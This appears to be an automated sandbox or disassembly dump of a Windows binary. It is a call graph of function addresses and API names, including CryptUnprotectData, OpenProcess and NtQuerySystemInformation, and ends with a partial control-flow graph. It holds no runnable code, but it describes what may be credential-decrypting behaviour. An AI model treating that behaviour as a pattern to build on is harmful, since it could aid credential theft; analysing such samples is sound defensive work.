39185->39173 39186->39173 39188 404413 FreeLibrary 39187->39188 39189 40441e 39187->39189 39188->39189 39189->38516 39190->38510 39192 40447e 39191->39192 39193 40442e 39191->39193 39194 404485 CryptUnprotectData 39192->39194 39195 40449c 39192->39195 39196 40b2cc 27 API calls 39193->39196 39194->39195 39195->38510 39197 404438 39196->39197 39198 40a804 8 API calls 39197->39198 39199 40443e 39198->39199 39200 404445 39199->39200 39201 404467 39199->39201 39202 40b273 27 API calls 39200->39202 39201->39192 39204 404475 FreeLibrary 39201->39204 39203 40444f GetProcAddress 39202->39203 39203->39201 39205 404460 39203->39205 39204->39192 39205->39201 39207 4135f6 39206->39207 39208 4135eb FreeLibrary 39206->39208 39207->38519 39208->39207 39210 4449c4 39209->39210 39211 444a52 39209->39211 39212 40b2cc 27 API calls 39210->39212 39211->38536 39211->38537 39213 4449cb 39212->39213 39214 40a804 8 API calls 39213->39214 39215 4449d1 39214->39215 39216 40b273 27 API calls 39215->39216 39217 4449dc GetProcAddress 39216->39217 39230->38547 39231->38547 39232->38547 39233->38547 39234->38538 39236 403a29 39235->39236 39250 403bed memset memset 39236->39250 39238 403ae7 39263 40b1ab free free 39238->39263 39240 403a3f memset 39244 403a2f 39240->39244 39241 403aef 39241->38555 39242 40a8d0 7 API calls 39242->39244 39243 409d1f 6 API calls 39243->39244 39244->39238 39244->39240 39244->39242 39244->39243 39245 409b98 GetFileAttributesW 39244->39245 39245->39244 39247 40a051 GetFileTime CloseHandle 39246->39247 39248 4039ca CompareFileTime 39246->39248 39247->39248 39248->38555 39249->38554 39251 414c2e 17 API calls 39250->39251 39252 403c38 39251->39252 39253 409719 2 API calls 39252->39253 39254 403c3f wcscat 39253->39254 39255 414c2e 17 API calls 39254->39255 39256 403c61 39255->39256 39257 409719 2 API calls 39256->39257 39258 403c68 wcscat 39257->39258 39264 403af5 39258->39264 39261 403af5 20 API calls 39262 403c95 39261->39262 39262->39244 39263->39241 39265 403b02 39264->39265 39266 40ae18 9 API calls 39265->39266 39274 403b37 39266->39274 39267 403bdb 39268 40aebe FindClose 39267->39268 39270 403be6 39268->39270 39269 40add4 wcscmp wcscmp 39269->39274 39270->39261 39271 40ae18 9 API calls 39271->39274 39272 40ae51 9 API calls 39272->39274 39273 40aebe FindClose 39273->39274 39274->39267 39274->39269 39274->39271 39274->39272 39274->39273 39275 40a8d0 7 API calls 39274->39275 39275->39274 39277 409d1f 6 API calls 39276->39277 39278 404190 39277->39278 39291 409b98 GetFileAttributesW 39278->39291 39280 40419c 39281 4041a7 6 API calls 39280->39281 39282 40435c 39280->39282 39284 40424f 39281->39284 39282->38581 39284->39282 39285 40425e memset 39284->39285 39287 409d1f 6 API calls 39284->39287 39288 40a8ab 9 API calls 39284->39288 39292 414842 39284->39292 39285->39284 39286 404296 wcscpy 39285->39286 39286->39284 39287->39284 39289 4042b6 memset memset _snwprintf wcscpy 39288->39289 39289->39284 39290->38579 39291->39280 39295 41443e 39292->39295 39294 414866 39294->39284 39296 41444b 39295->39296 39297 414451 39296->39297 39298 4144a3 GetPrivateProfileStringW 39296->39298 39299 414491 39297->39299 39300 414455 wcschr 39297->39300 39298->39294 39302 414495 WritePrivateProfileStringW 39299->39302 39300->39299 39301 414463 _snwprintf 39300->39301 39301->39302 39302->39294 39303->38585 39305 40b2cc 27 API calls 39304->39305 39306 409615 39305->39306 39307 409d1f 6 API calls 39306->39307 39308 409625 39307->39308 39333 409b98 GetFileAttributesW 39308->39333 39310 409634 39311 409648 39310->39311 39334 4091b8 memset 39310->39334 39313 40b2cc 27 API calls 39311->39313 39316 408801 39311->39316 39314 40965d 39313->39314 39315 409d1f 6 API calls 39314->39315 39317 40966d 39315->39317 39316->38588 39316->38615 39386 409b98 GetFileAttributesW 39317->39386 39319 40967c 39319->39316 39320 409681 39319->39320 39387 409529 72 API calls 39320->39387 39322 409690 39322->39316 39333->39310 39388 40a6e6 WideCharToMultiByte 39334->39388 39336 409202 39389 444432 39336->39389 39339 40b273 27 API calls 39340 409236 39339->39340 39435 438552 39340->39435 39366 40951d 39366->39311 39386->39319 39387->39322 39388->39336 39485 4438b5 39389->39485 39391 44444c 39392 409215 39391->39392 39499 415a6d 39391->39499 39392->39339 39392->39366 39394 4442e6 11 API calls 39396 44469e 39394->39396 39395 444486 39397 4444b9 memcpy 39395->39397 39434 4444a4 39395->39434 39396->39392 39503 415258 39397->39503 39434->39394 39621 438460 39435->39621 39486 4438d0 39485->39486 39496 4438c9 39485->39496 39573 415378 memcpy memcpy 39486->39573 39496->39391 39500 415a77 39499->39500 39501 415a8d 39500->39501 39502 415a7e memset 39500->39502 39501->39395 39502->39501 39504 4438b5 11 API calls 39503->39504 39505 41525d 39504->39505 39633 41703f 39621->39633 39634 417044 39633->39634 39635 41705c 39633->39635 39771 413f4f 39744->39771 39747 413f37 K32GetModuleFileNameExW 39748 413f4a 39747->39748 39748->38645 39750 413969 wcscpy 39749->39750 39751 41396c wcschr 39749->39751 39754 413a3a 39750->39754 39751->39750 39753 41398e 39751->39753 39776 4097f7 wcslen wcslen _memicmp 39753->39776 39754->38645 39756 41399a 39757 4139a4 memset 39756->39757 39758 4139e6 39756->39758 39777 409dd5 GetWindowsDirectoryW wcscpy 39757->39777 39760 413a31 wcscpy 39758->39760 39761 4139ec memset 39758->39761 39760->39754 39778 409dd5 GetWindowsDirectoryW wcscpy 39761->39778 39762 4139c9 wcscpy wcscat 39762->39754 39764 413a11 memcpy wcscat 39764->39754 39766 413cb0 GetModuleHandleW 39765->39766 39767 413cda 39765->39767 39766->39767 39770 413cbf GetProcAddress 39766->39770 39768 413ce3 GetProcessTimes 39767->39768 39769 413cf6 39767->39769 39768->38650 39769->38650 39770->39767 39772 413f2f 39771->39772 39773 413f54 39771->39773 39772->39747 39772->39748 39774 40a804 8 API calls 39773->39774 39775 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39774->39775 39775->39772 39776->39756 39777->39762 39778->39764 39779->38670 39780->38694 39782 409cf9 GetVersionExW 39781->39782 39783 409d0a 39781->39783 39782->39783 39783->38700 39783->38705 39784->38706 39785->38710 39786->38712 39787->38778 39789 40bba5 39788->39789 39833 40cc26 39789->39833 39792 40bd4b 39861 40cc0c 39792->39861 39797 40b2cc 27 API calls 39798 40bbef 39797->39798 39854 40ccf0 39798->39854 39800 40bbf5 39800->39792 39858 40ccb4 39800->39858 39803 40cf04 17 API calls 39804 40bc2e 39803->39804 39805 40bd43 39804->39805 39806 40b2cc 27 API calls 39804->39806 39807 40cc0c 4 API calls 39805->39807 39808 40bc40 39806->39808 39807->39792 39809 40ccf0 _wcsicmp 39808->39809 39810 40bc46 39809->39810 39810->39805 39811 40bc61 memset memset WideCharToMultiByte 39810->39811 39868 40103c strlen 39811->39868 39813 40bcc0 39814 40b273 27 API calls 39813->39814 39815 40bcd0 memcmp 39814->39815 39815->39805 39816 40bce2 39815->39816 39817 404423 38 API calls 39816->39817 39818 40bd10 39817->39818 39818->39805 39819 40bd3a LocalFree 39818->39819 39820 40bd1f memcpy 39818->39820 39819->39805 39820->39819 39821->38793 39822->38830 39823->38830 39824->38830 39825->38830 39826->38830 39827->38830 39828->38830 39829->38830 39830->38830 39831->38805 39832->38827 39869 4096c3 CreateFileW 39833->39869 39835 40cc34 39836 40cc3d GetFileSize 39835->39836 39844 40bbca 39835->39844 39837 40afcf 2 API calls 39836->39837 39838 40cc64 39837->39838 39870 40a2ef ReadFile 39838->39870 39840 40cc71 39871 40ab4a MultiByteToWideChar 39840->39871 39842 40cc95 CloseHandle 39843 40b04b ??3@YAXPAX 39842->39843 39843->39844 39844->39792 39845 40cf04 39844->39845 39846 40b633 free 39845->39846 39847 40cf14 39846->39847 39877 40b1ab free free 39847->39877 39849 40cf1b 39850 40cfef 39849->39850 39853 40bbdd 39849->39853 39878 40cd4b 39849->39878 39852 40cd4b 14 API calls 39850->39852 39852->39853 39853->39792 39853->39797 39855 40ccfd 39854->39855 39857 40cd3f 39854->39857 39856 40cd26 _wcsicmp 39855->39856 39855->39857 39856->39855 39856->39857 39857->39800 39859 40aa29 6 API calls 39858->39859 39860 40bc26 39859->39860 39860->39803 39862 40b633 free 39861->39862 39863 40cc15 39862->39863 39864 40aa04 free 39863->39864 39865 40cc1d 39864->39865 39927 40b1ab free free 39865->39927 39867 40b7d4 memset CreateFileW 39867->38785 39867->38786 39868->39813 39869->39835 39870->39840 39872 40ab93 39871->39872 39873 40ab6b 39871->39873 39872->39842 39874 40a9ce 4 API calls 39873->39874 39875 40ab74 39874->39875 39876 40ab7c MultiByteToWideChar 39875->39876 39876->39872 39877->39849 39879 40cd7b 39878->39879 39912 40aa29 39879->39912 39881 40cef5 39882 40aa04 free 39881->39882 39883 40cefd 39882->39883 39883->39849 39885 40aa29 6 API calls 39886 40ce1d 39885->39886 39887 40aa29 6 API calls 39886->39887 39888 40ce3e 39887->39888 39889 40ce6a 39888->39889 39920 40abb7 wcslen memmove 39888->39920 39890 40ce9f 39889->39890 39923 40abb7 wcslen memmove 39889->39923 39893 40a8d0 7 API calls 39890->39893 39896 40ceb5 39893->39896 39894 40ce56 39921 40aa71 wcslen 39894->39921 39895 40ce8b 39924 40aa71 wcslen 39895->39924 39900 40a8d0 7 API calls 39896->39900 39899 40ce5e 39922 40abb7 wcslen memmove 39899->39922 39903 40cecb 39900->39903 39901 40ce93 39925 40abb7 wcslen memmove 39901->39925 39926 40d00b malloc memcpy free free 39903->39926 39906 40cedd 39907 40aa04 free 39906->39907 39908 40cee5 39907->39908 39909 40aa04 free 39908->39909 39910 40ceed 39909->39910 39911 40aa04 free 39910->39911 39911->39881 39913 40aa33 39912->39913 39914 40aa63 39912->39914 39915 40aa44 39913->39915 39916 40aa38 wcslen 39913->39916 39914->39881 39914->39885 39917 40a9ce 4 API calls 39915->39917 39916->39915 39918 40aa4d 39917->39918 39918->39914 39919 40aa51 memcpy 39918->39919 39919->39914 39920->39894 39921->39899 39922->39889 39923->39895 39924->39901 39925->39890 39926->39906 39927->39867 39928->38845 39929->38853 39930 442774 39931 442799 39930->39931 39932 44277b 39930->39932 39955 42bf4c 14 API calls 39931->39955 39947 42b63e 39932->39947 39936 4427a5 39956 42bfcf memcpy 39936->39956 39939 4427ba 39957 42c00a 11 API calls 39939->39957 39941 441897 39942 4418ea 39941->39942 39943 442bd4 39941->39943 39944 4418e2 39941->39944 39943->39942 39959 441409 memset 39943->39959 39944->39942 39958 4414a9 12 API calls 39944->39958 39960 42b4ec 39947->39960 39949 42b64c 39966 42b5e4 39949->39966 39951 42b65e 39952 42b66d 39951->39952 39973 42b3c6 11 API calls 39951->39973 39954 42b1b5 17 API calls 39952->39954 39954->39931 39955->39936 39956->39939 39957->39941 39958->39942 39959->39943 39962 42b4ff 39960->39962 39961 415a91 memset 39963 42b52c 39961->39963 39962->39961 39964 42b553 memcpy 39963->39964 39965 42b545 39963->39965 39964->39965 39965->39949 39967 42b5eb 39966->39967 39971 42b604 39966->39971 39974 42b896 memset 39967->39974 39969 42b5f5 39975 42b896 memset 39969->39975 39971->39951 39972 42b5ff 39972->39951 39973->39952 39974->39969 39975->39972 39976 4147f3 39979 414561 39976->39979 39978 414813 39980 41456d 39979->39980 39981 41457f GetPrivateProfileIntW 39979->39981 39984 4143f1 memset _itow WritePrivateProfileStringW 39980->39984 39981->39978 39983 41457a 39983->39978 39984->39983 39985 4148b6 FindResourceW 39986 4148cf SizeofResource 39985->39986 39989 4148f9 39985->39989 39987 4148e0 LoadResource 39986->39987 39986->39989 39988 4148ee LockResource 39987->39988 39987->39989 39988->39989 39990 441b3f 40000 43a9f6 39990->40000 39992 441b61 40173 4386af memset 39992->40173 39994 44189a 39995 442bd4 39994->39995 39996 4418e2 39994->39996 39997 4418ea 39995->39997 40175 441409 memset 39995->40175 39996->39997 40174 4414a9 12 API calls 39996->40174 40001 43aa20 40000->40001 40002 43aadf 40000->40002 40001->40002 40003 43aa34 memset 40001->40003 40002->39992 40004 43aa56 40003->40004 40005 43aa4d 40003->40005 40176 43a6e7 40004->40176 40184 42c02e memset 40005->40184 40010 43aad3 40186 4169a7 11 API calls 40010->40186 40011 43aaae 40011->40002 40011->40010 40026 43aae5 40011->40026 40013 43ac18 40015 43ac47 40013->40015 40188 42bbd5 memcpy memcpy memcpy memset memcpy 40013->40188 40016 43aca8 40015->40016 40189 438eed 16 API calls 40015->40189 40020 43acd5 40016->40020 40191 4233ae 11 API calls 40016->40191 40019 43ac87 40190 4233c5 16 API calls 40019->40190 40192 423426 11 API calls 40020->40192 40024 43ace1 40193 439811 163 API calls 40024->40193 40025 43a9f6 161 API calls 40025->40026 40026->40002 40026->40013 40026->40025 40187 439bbb 22 API calls 40026->40187 40028 43acfd 40034 43ad2c 40028->40034 40194 438eed 16 API calls 40028->40194 40030 43ad19 40195 4233c5 16 API calls 40030->40195 40032 43ad58 40196 44081d 163 API calls 40032->40196 40034->40032 40036 43add9 40034->40036 40036->40036 40200 423426 11 API calls 40036->40200 40037 43ae3a memset 40038 43ae73 40037->40038 40201 42e1c0 147 API calls 40038->40201 40039 43adab 40198 438c4e 163 API calls 40039->40198 40041 43ad6c 40041->40002 40041->40039 40197 42370b memset memcpy memset 40041->40197 40043 43ae96 40202 42e1c0 147 API calls 40043->40202 40045 43adcc 40199 440f84 12 API calls 40045->40199 40048 43aea8 40049 43aec1 40048->40049 40203 42e199 147 API calls 40048->40203 40051 43af00 40049->40051 40204 42e1c0 147 API calls 40049->40204 40051->40002 40054 43af1a 40051->40054 40055 43b3d9 40051->40055 40205 438eed 16 API calls 40054->40205 40060 43b3f6 40055->40060 40067 43b4c8 40055->40067 40057 43b60f 40057->40002 40264 4393a5 17 API calls 40057->40264 40058 43af2f 40206 4233c5 16 API calls 40058->40206 40246 432878 12 API calls 40060->40246 40062 43af51 40207 423426 11 API calls 40062->40207 40065 43af7d 40208 423426 11 API calls 40065->40208 40066 43b4f2 40253 43a76c 21 API calls 40066->40253 40067->40066 40252 42bbd5 memcpy memcpy memcpy memset memcpy 40067->40252 40071 43b529 40254 44081d 163 API calls 40071->40254 40072 43b428 40100 43b462 40072->40100 40247 432b60 16 API calls 40072->40247 40073 43af94 40209 423330 11 API calls 40073->40209 40077 43b47e 40080 43b497 40077->40080 40249 42374a memcpy memset memcpy memcpy memcpy 40077->40249 40078 43b544 40088 43b55c 40078->40088 40255 42c02e memset 40078->40255 40079 43afca 40210 423330 11 API calls 40079->40210 40250 4233ae 11 API calls 40080->40250 40085 43afdb 40211 4233ae 11 API calls 40085->40211 40087 43b4b1 40251 423399 11 API calls 40087->40251 40256 43a87a 163 API calls 40088->40256 40090 43b56c 40093 43b58a 40090->40093 40257 423330 11 API calls 40090->40257 40092 43afee 40212 44081d 163 API calls 40092->40212 40258 440f84 12 API calls 40093->40258 40095 43b4c1 40260 42db80 163 API calls 40095->40260 40099 43b592 40259 43a82f 16 API calls 40099->40259 40248 423330 11 API calls 40100->40248 40103 43b5b4 40261 438c4e 163 API calls 40103->40261 40105 43b5cf 40262 42c02e memset 40105->40262 40107 43b005 40107->40002 40112 43b01f 40107->40112 40213 42d836 163 API calls 40107->40213 40108 43b1ef 40223 4233c5 16 API calls 40108->40223 40110 43b212 40224 423330 11 API calls 40110->40224 40112->40108 40221 423330 11 API calls 40112->40221 40222 42d71d 163 API calls 40112->40222 40114 43add4 40114->40057 40263 438f86 16 API calls 40114->40263 40117 43b087 40214 4233ae 11 API calls 40117->40214 40118 43b22a 40225 42ccb5 11 API calls 40118->40225 40121 43b10f 40217 423330 11 API calls 40121->40217 40122 43b23f 40226 4233ae 11 API calls 40122->40226 40124 43b257 40227 4233ae 11 API calls 40124->40227 40128 43b129 40218 4233ae 11 API calls 40128->40218 40129 43b26e 40228 4233ae 11 API calls 40129->40228 40131 43b09a 40131->40121 40215 42cc15 19 API calls 40131->40215 40216 4233ae 11 API calls 40131->40216 40133 43b282 40229 43a87a 163 API calls 40133->40229 40135 43b13c 40219 440f84 12 API calls 40135->40219 40137 43b29d 40230 423330 11 API calls 40137->40230 40140 43b15f 40220 4233ae 11 API calls 40140->40220 40141 43b2af 40143 43b2b8 40141->40143 40144 43b2ce 40141->40144 40231 4233ae 11 API calls 40143->40231 40232 440f84 12 API calls 40144->40232 40147 43b2c9 40234 4233ae 11 API calls 40147->40234 40148 43b2da 40233 42370b memset memcpy memset 40148->40233 40151 43b2f9 40235 423330 11 API calls 40151->40235 40153 43b30b 40236 423330 11 API calls 40153->40236 40155 43b325 40237 423399 11 API calls 40155->40237 40157 43b332 40238 4233ae 11 API calls 40157->40238 40159 43b354 40239 423399 11 API calls 40159->40239 40161 43b364 40240 43a82f 16 API calls 40161->40240 40163 43b370 40241 42db80 163 API calls 40163->40241 40165 43b380 40242 438c4e 163 API calls 40165->40242 40167 43b39e 40243 423399 11 API calls 40167->40243 40169 43b3ae 40244 43a76c 21 API calls 40169->40244 40171 43b3c3 40245 423399 11 API calls 40171->40245 40173->39994 40174->39997 40175->39995 40177 43a6f5 40176->40177 40183 43a765 40176->40183 40177->40183 40265 42a115 40177->40265 40181 43a73d 40182 42a115 147 API calls 40181->40182 40181->40183 40182->40183 40183->40002 40185 4397fd memset 40183->40185 40184->40004 40185->40011 40186->40002 40187->40026 40188->40015 40189->40019 40190->40016 40191->40020 40192->40024 40193->40028 40194->40030 40195->40034 40196->40041 40197->40039 40198->40045 40199->40114 40200->40037 40201->40043 40202->40048 40203->40049 40204->40049 40205->40058 40206->40062 40207->40065 40208->40073 40209->40079 40210->40085 40211->40092 40212->40107 40213->40117 40214->40131 40215->40131 40216->40131 40217->40128 40218->40135 40219->40140 40220->40112 40221->40112 40222->40112 40223->40110 40224->40118 40225->40122 40226->40124 40227->40129 40228->40133 40229->40137 40230->40141 40231->40147 40232->40148 40233->40147 40234->40151 40235->40153 40236->40155 40237->40157 40238->40159 40239->40161 40240->40163 40241->40165 40242->40167 40243->40169 40244->40171 40245->40114 40246->40072 40247->40100 40248->40077 40249->40080 40250->40087 40251->40095 40252->40066 40253->40071 40254->40078 40255->40088 40256->40090 40257->40093 40258->40099 40259->40095 40260->40103 40261->40105 40262->40114 40263->40057 40264->40002 40266 42a175 40265->40266 40268 42a122 40265->40268 40266->40183 40271 42b13b 147 API calls 40266->40271 40268->40266 40269 42a115 147 API calls 40268->40269 40272 43a174 40268->40272 40296 42a0a8 147 API calls 40268->40296 40269->40268 40271->40181 40286 43a196 40272->40286 40287 43a19e 40272->40287 40273 43a306 40273->40286 40312 4388c4 14 API calls 40273->40312 40276 42a115 147 API calls 40276->40287 40277 415a91 memset 40277->40287 40278 43a642 40278->40286 40315 4169a7 11 API calls 40278->40315 40282 43a635 40314 42c02e memset 40282->40314 40286->40268 40287->40273 40287->40276 40287->40277 40287->40286 40297 42ff8c 40287->40297 40305 4165ff 40287->40305 40308 439504 13 API calls 40287->40308 40309 4312d0 147 API calls 40287->40309 40310 42be4c memcpy memcpy memcpy memset memcpy 40287->40310 40311 43a121 11 API calls 40287->40311 40289 4169a7 11 API calls 40290 43a325 40289->40290 40290->40278 40290->40282 40290->40286 40290->40289 40291 42b5b5 memset memcpy 40290->40291 40292 42bf4c 14 API calls 40290->40292 40293 42b63e 14 API calls 40290->40293 40295 4165ff 11 API calls 40290->40295 40313 42bfcf memcpy 40290->40313 40291->40290 40292->40290 40293->40290 40295->40290 40296->40268 40316 43817e 40297->40316 40299 42ff99 40300 42ffe3 40299->40300 40301 42ffd0 40299->40301 40304 42ff9d 40299->40304 40321 4169a7 11 API calls 40300->40321 40320 4169a7 11 API calls 40301->40320 40304->40287 40306 4165a0 11 API calls 40305->40306 40307 41660d 40306->40307 40307->40287 40308->40287 40309->40287 40310->40287 40311->40287 40312->40290 40313->40290 40314->40278 40315->40286 40317 438187 40316->40317 40319 438192 40316->40319 40322 4380f6 40317->40322 40319->40299 40320->40304 40321->40304 40324 43811f 40322->40324 40323 438164 40323->40319 40324->40323 40326 4300e8 3 API calls 40324->40326 40327 437e5e 40324->40327 40326->40324 40350 437d3c 40327->40350 40329 437eb3 40329->40324 40330 437ea9 40330->40329 40336 437f22 40330->40336 40365 41f432 40330->40365 40333 437f06 40412 415c56 11 API calls 40333->40412 40335 437f95 40413 415c56 11 API calls 40335->40413 40337 437f7f 40336->40337 40338 432d4e 3 API calls 40336->40338 40337->40335 40340 43802b 40337->40340 40338->40337 40341 4165ff 11 API calls 40340->40341 40342 438054 40341->40342 40376 437371 40342->40376 40345 43806b 40346 438094 40345->40346 40414 42f50e 138 API calls 40345->40414 40348 437fa3 40346->40348 40349 4300e8 3 API calls 40346->40349 40348->40329 40415 41f638 104 API calls 40348->40415 40349->40348 40351 437d69 40350->40351 40354 437d80 40350->40354 40416 437ccb 11 API calls 40351->40416 40353 437d76 40353->40330 40354->40353 40355 437da3 40354->40355 40357 437d90 40354->40357 40358 438460 134 API calls 40355->40358 40357->40353 40420 437ccb 11 API calls 40357->40420 40361 437dcb 40358->40361 40360 437de8 40419 424f26 123 API calls 40360->40419 40361->40360 40417 444283 13 API calls 40361->40417 40363 437dfc 40418 437ccb 11 API calls 40363->40418 40366 41f54d 40365->40366 40372 41f44f 40365->40372 40367 41f466 40366->40367 40450 41c635 memset memset 40366->40450 40367->40333 40367->40336 40372->40367 40374 41f50b 40372->40374 40421 41f1a5 40372->40421 40446 41c06f memcmp 40372->40446 40447 41f3b1 90 API calls 40372->40447 40448 41f398 86 API calls 40372->40448 40374->40366 40374->40367 40449 41c295 86 API calls 40374->40449 40377 41703f 11 API calls 40376->40377 40378 437399 40377->40378 40379 43739d 40378->40379 40382 4373ac 40378->40382 40451 4446ea 11 API calls 40379->40451 40381 4373a7 40381->40345 40383 416935 16 API calls 40382->40383 40384 4373ca 40383->40384 40386 438460 134 API calls 40384->40386 40390 4251c4 137 API calls 40384->40390 40394 415a91 memset 40384->40394 40397 43758f 40384->40397 40409 437584 40384->40409 40411 437d3c 135 API calls 40384->40411 40452 425433 13 API calls 40384->40452 40453 425413 17 API calls 40384->40453 40454 42533e 16 API calls 40384->40454 40455 42538f 16 API calls 40384->40455 40456 42453e 123 API calls 40384->40456 40385 4375bc 40388 415c7d 16 API calls 40385->40388 40386->40384 40389 4375d2 40388->40389 40389->40381 40391 4442e6 11 API calls 40389->40391 40390->40384 40392 4375e2 40391->40392 40392->40381 40459 444283 13 API calls 40392->40459 40394->40384 40457 42453e 123 API calls 40397->40457 40398 4375f4 40403 437620 40398->40403 40404 43760b 40398->40404 40402 43759f 40405 416935 16 API calls 40402->40405 40407 416935 16 API calls 40403->40407 40460 444283 13 API calls 40404->40460 40405->40409 40407->40381 40409->40385 40458 42453e 123 API calls 40409->40458 40410 437612 memcpy 40410->40381 40411->40384 40412->40329 40413->40348 40414->40346 40415->40329 40416->40353 40417->40363 40418->40360 40419->40353 40420->40353 40422 41bc3b 101 API calls 40421->40422 40423 41f1b4 40422->40423 40424 41edad 86 API calls 40423->40424 40431 41f282 40423->40431 40425 41f1cb 40424->40425 40426 41f1f5 memcmp 40425->40426 40427 41f20e 40425->40427 40425->40431 40426->40427 40428 41f21b memcmp 40427->40428 40427->40431 40429 41f326 40428->40429 40432 41f23d 40428->40432 40430 41ee6b 86 API calls 40429->40430 40429->40431 40430->40431 40431->40372 40432->40429 40433 41f28e memcmp 40432->40433 40435 41c8df 56 API calls 40432->40435 40433->40429 40434 41f2a9 40433->40434 40434->40429 40437 41f308 40434->40437 40438 41f2d8 40434->40438 40436 41f269 40435->40436 40436->40429 40439 41f287 40436->40439 40440 41f27a 40436->40440 40437->40429 40444 4446ce 11 API calls 40437->40444 40441 41ee6b 86 API calls 40438->40441 40439->40433 40442 41ee6b 86 API calls 40440->40442 40443 41f2e0 40441->40443 40442->40431 40445 41b1ca memset 40443->40445 40444->40429 40445->40431 40446->40372 40447->40372 40448->40372 40449->40366 40450->40367 40451->40381 40452->40384 40453->40384 40454->40384 40455->40384 40456->40384 40457->40402 40458->40385 40459->40398 40460->40410 40461 441819 40464 430737 40461->40464 40463 441825 40465 430756 40464->40465 40477 43076d 40464->40477 40466 430774 40465->40466 40467 43075f 40465->40467 40478 43034a 40466->40478 40489 4169a7 11 API calls 40467->40489 40470 4307ce 40472 430819 memset 40470->40472 40482 415b2c 40470->40482 40471 43077e 40471->40470 40475 4307fa 40471->40475 40471->40477 40472->40477 40474 4307e9 40474->40472 40474->40477 40490 4169a7 11 API calls 40475->40490 40477->40463 40479 43034e 40478->40479 40481 430359 40478->40481 40491 415c23 memcpy 40479->40491 40481->40471 40483 415b46 40482->40483 40484 415b42 40482->40484 40483->40474 40484->40483 40485 415b94 40484->40485 40487 415b5a 40484->40487 40486 4438b5 10 API calls 40485->40486 40486->40483 40487->40483 40488 415b79 memcpy 40487->40488 40488->40483 40489->40477 40490->40477 40491->40481 40492 441939 40517 441247 40492->40517 40495 4418ea 40496 441897 40498 442bd4 40496->40498 40499 4418e2 40496->40499 40498->40495 40521 441409 memset 40498->40521 40499->40495 40520 4414a9 12 API calls 40499->40520 40502 4308a4 40503 4308e4 40502->40503 40504 4308bc 40502->40504 40527 42b896 memset 40503->40527 40522 42c0c8 147 API calls 40504->40522 40507 4308d3 40509 4308e8 40507->40509 40510 4308d8 40507->40510 40508 430931 40508->40496 40524 42b896 memset 40509->40524 40523 4169a7 11 API calls 40510->40523 40513 4308f3 40525 42bbbe memcpy memcpy memcpy memset memcpy 40513->40525 40515 4308ff 40526 415c23 memcpy 40515->40526 40518 42b63e 14 API calls 40517->40518 40519 441259 40518->40519 40519->40495 40519->40496 40519->40502 40520->40495 40521->40498 40522->40507 40523->40503 40524->40513 40525->40515 40526->40503 40527->40508 40528 41493c EnumResourceNamesW 40529 441a5b 40530 441a66 40529->40530 40533 430937 40530->40533 40534 430956 40533->40534 40541 430977 40533->40541 40537 430969 40534->40537 40539 43097e 40534->40539 40534->40541 40536 430a79 40610 4169a7 11 API calls 40537->40610 40539->40541 40542 431a7b 40539->40542 40611 42c02e memset 40541->40611 40543 431aa3 40542->40543 40599 431b2e 40542->40599 40545 43817e 139 API calls 40543->40545 40543->40599 40547 431ab6 40545->40547 40546 432116 40633 4325ad memset 40546->40633 40552 431b15 40547->40552 40547->40599 40616 43041c 12 API calls 40547->40616 40549 432122 40549->40541 40551 431ad5 40553 431b04 40551->40553 40551->40599 40617 42faf4 12 API calls 40551->40617 40554 431baa 40552->40554 40555 431b7c memcmp 40552->40555 40552->40599 40557 42ff8c 139 API calls 40553->40557 40558 431bb0 40554->40558 40559 431bcb 40554->40559 40555->40554 40573 431b95 40555->40573 40557->40552 40619 4169a7 11 API calls 40558->40619 40561 431bd1 40559->40561 40562 431c45 40559->40562 40564 43034a memcpy 40561->40564 40566 4165ff 11 API calls 40562->40566 40565 431bdc 40564->40565 40565->40599 40620 430468 11 API calls 40565->40620 40568 431c65 40566->40568 40574 431cba 40568->40574 40568->40599 40621 42bf4c 14 API calls 40568->40621 40570 431bef 40570->40568 40570->40573 40570->40599 40571 415a91 memset 40575 431d17 40571->40575 40572 431ca1 40572->40599 40622 42bfcf memcpy 40572->40622 40573->40599 40618 4169a7 11 API calls 40573->40618 40574->40571 40576 431d27 memcpy 40575->40576 40575->40599 40584 431da8 40576->40584 40587 431e97 40576->40587 40578 431eb8 40624 4169a7 11 API calls 40578->40624 40579 431f3c 40581 431fc3 40579->40581 40582 431f45 40579->40582 40626 4397fd memset 40581->40626 40612 4172c8 40582->40612 40584->40578 40584->40587 40588 431e12 memcpy 40584->40588 40584->40599 40623 430af5 16 API calls 40584->40623 40586 431fd4 40586->40599 40627 4328e4 12 API calls 40586->40627 40587->40579 40592 431f6a 40587->40592 40588->40584 40591 431feb 40628 4233ae 11 API calls 40591->40628 40592->40599 40625 4169a7 11 API calls 40592->40625 40594 431ffc 40595 43202e 40594->40595 40598 4165ff 11 API calls 40594->40598 40629 42fe8b 22 API calls 40595->40629 40598->40595 40632 42c02e memset 40599->40632 40600 432057 40600->40599 40630 431917 23 API calls 40600->40630 40602 432079 40631 430b5d 11 API calls 40602->40631 40610->40541 40611->40536 40614 4172d6 40612->40614 40613 417302 40613->40599 40614->40613 40634 41715f 40614->40634 40616->40551 40617->40553 40618->40599 40619->40599 40620->40570 40621->40572 40622->40574 40623->40584 40624->40599 40625->40599 40626->40586 40627->40591 40628->40594 40629->40600 40630->40602 40632->40546 40633->40549 40635 417174 40634->40635 40636 4171a8 memset 40635->40636 40637 41717d 40635->40637 40636->40637 40637->40613

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess 